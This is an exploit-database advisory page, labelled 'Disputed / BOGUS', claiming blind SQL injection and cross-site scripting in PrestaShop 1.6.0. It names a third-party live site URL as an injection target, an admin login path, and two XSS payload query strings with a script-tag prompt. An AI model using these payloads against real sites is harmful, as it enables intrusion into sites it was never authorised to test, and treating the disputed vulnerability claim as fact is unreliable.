Disputed / BOGUS

PrestaShop 1.6.0 Blind SQL Injection

Published / (Updated)
Credit
Risk
2014-05-05 / 2014-05-07
indoushka
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

PrestaShop V1.6.0 Blind Sql Vulnerability 0-Day
===============================================
Author : indoushka
vendor : http://www.prestashop.com/fr/telechargement
Dork : No 4 noob

http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject her)

Login :

path/admin

Cross site scripting :

/index.php?controller=search&tag=bat_213771818860'():;771818860
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search

References:

http://cxsecurity.com/issue/WLB-2014040091
http://www.prestashop.com/fr/telechargement


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com